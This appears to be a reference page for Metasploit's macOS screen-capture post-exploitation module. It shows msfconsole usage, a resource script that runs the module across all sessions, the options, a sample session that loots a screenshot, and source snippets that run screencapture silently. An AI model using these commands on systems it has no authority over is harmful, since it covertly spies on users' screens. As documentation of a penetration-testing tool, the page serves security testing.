OSX Screen Capture - Metasploit
This page contains detailed information about how to use the post/osx/capture/screen metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: OSX Screen Capture
Module: post/osx/capture/screen
Source code: modules/post/osx/capture/screen.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module takes screenshots of target desktop and automatically downloads them.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/osx/capture/screen
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/osx/capture/screen
msf post(screen) > show options
... show and set options ...
msf post(screen) > set SESSION session-id
msf post(screen) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/osx/capture/screen")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module takes screenshots of target desktop and automatically downloads them.
Verification Steps
- Start msfconsole
- Get a shell, user level is fine
- Do:
use post/osx/capture/screen
- Do:
set session #
- Do:
run
- You should have a screenshot saved to loot
Options
COUNT
The number of screenshots to collect. Default is 1
.
DELAY
Interval between screenshots in seconds. 0 for no delay. Default is 10
.
EXE_PATH
Path to remote screencapture executable. Default is /usr/sbin/screencapture
FILETYPE
File format to use when saving a snapshot (Accepted: png, gif). Default is png
.
TMP_PATH
Path to remote temp directory. Default is /tmp/<random>
Scenarios
User level shell on OSX 10.14.4
msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen
msf5 post(osx/capture/screen) > set session 1
session => 1
msf5 post(osx/capture/screen) > run
[*] Capturing 1 screenshots with a delay of 10 seconds
[*] Screen Capturing Complete
[*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot
[*] Post module execution completed
msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
222.222.2.222 screen_capture.screenshot screenshot.0.png image/png Screenshot /loot/20190414205923_default_222.222.2.222_screen_capture.s_194117.png
Go back to menu.
Msfconsole Usage
Here is how the osx/capture/screen post exploitation module looks in the msfconsole:
msf6 > use post/osx/capture/screen
msf6 post(osx/capture/screen) > show info
Name: OSX Screen Capture
Module: post/osx/capture/screen
Platform: OSX
Arch:
Rank: Normal
Provided by:
Peter Toth <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 1 yes Number of screenshots to collect.
DELAY 10 yes Interval between screenshots in seconds. 0 for no delay
EXE_PATH /usr/sbin/screencapture yes Path to remote screencapture executable
FILETYPE png yes File format to use when saving a snapshot (Accepted: png, gif)
SESSION yes The session to run this module on.
TMP_PATH /tmp/<random> yes Path to remote temp directory
Description:
This module takes screenshots of target desktop and automatically
downloads them.
Module Options
This is a complete list of options available in the osx/capture/screen post exploitation module:
msf6 post(osx/capture/screen) > show options
Module options (post/osx/capture/screen):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 1 yes Number of screenshots to collect.
DELAY 10 yes Interval between screenshots in seconds. 0 for no delay
EXE_PATH /usr/sbin/screencapture yes Path to remote screencapture executable
FILETYPE png yes File format to use when saving a snapshot (Accepted: png, gif)
SESSION yes The session to run this module on.
TMP_PATH /tmp/<random> yes Path to remote temp directory
Advanced Options
Here is a complete list of advanced options supported by the osx/capture/screen post exploitation module:
msf6 post(osx/capture/screen) > show advanced
Module advanced options (post/osx/capture/screen):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the osx/capture/screen module can do:
msf6 post(osx/capture/screen) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the osx/capture/screen post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(osx/capture/screen) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Aborting, screencapture binary not found.
Here is a relevant code snippet related to the "Aborting, screencapture binary not found." error message:
49: else
50: delay = datastore['DELAY']
51: end
52:
53: if not file?(exe_path)
54: print_error("Aborting, screencapture binary not found.")
55: return
56: end
57:
58: print_status "Capturing #{count} screenshots with a delay of #{delay} seconds"
59: # calculate a sane number of leading zeros to use. log of x is ~ the number of digits
Error taking the screenshot
Here is a relevant code snippet related to the "Error taking the screenshot" error message:
70: file = "#{tmp_path}/#{filename}"
71: cmd_exec("#{exe_path} -x -C -t #{file_type} #{file}")
72: data = read_file(file)
73: file_rm(file)
74: rescue ::Rex::Post::Meterpreter::RequestError => e
75: print_error("Error taking the screenshot")
76: vprint_error("#{e.class} #{e} #{e.backtrace}")
77: return
78: end
79:
80: unless data
No data for screenshot <NUM>
Here is a relevant code snippet related to the "No data for screenshot <NUM>" error message:
76: vprint_error("#{e.class} #{e} #{e.backtrace}")
77: return
78: end
79:
80: unless data
81: print_error("No data for screenshot #{num}")
82: next
83: end
84:
85: begin
86: # let's loot it using non-clobbering filename, even tho this is the source filename, not dest
Error storing screenshot
Here is a relevant code snippet related to the "Error storing screenshot" error message:
87: fn = "screenshot.%0#{leading_zeros}d.#{file_type}" % num
88: location = store_loot("screen_capture.screenshot", "image/#{file_type}", session, data, fn, "Screenshot")
89: vprint_good("Screenshot #{num} saved on #{location}")
90: file_locations << location
91: rescue ::IOError, ::Errno::ENOENT => e
92: print_error("Error storing screenshot")
93: vprint_error("#{e.class} #{e} #{e.backtrace}")
94: return
95: end
96:
97: end
Go back to menu.
Related Pull Requests
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7361 Merged Pull Request: Make OSX screencapture silent
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5964 Merged Pull Request: Support meterpreter for OS X post modules
Go back to menu.
See Also
Check also the following modules related to this module:
Authors
- Peter Toth <globetother[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.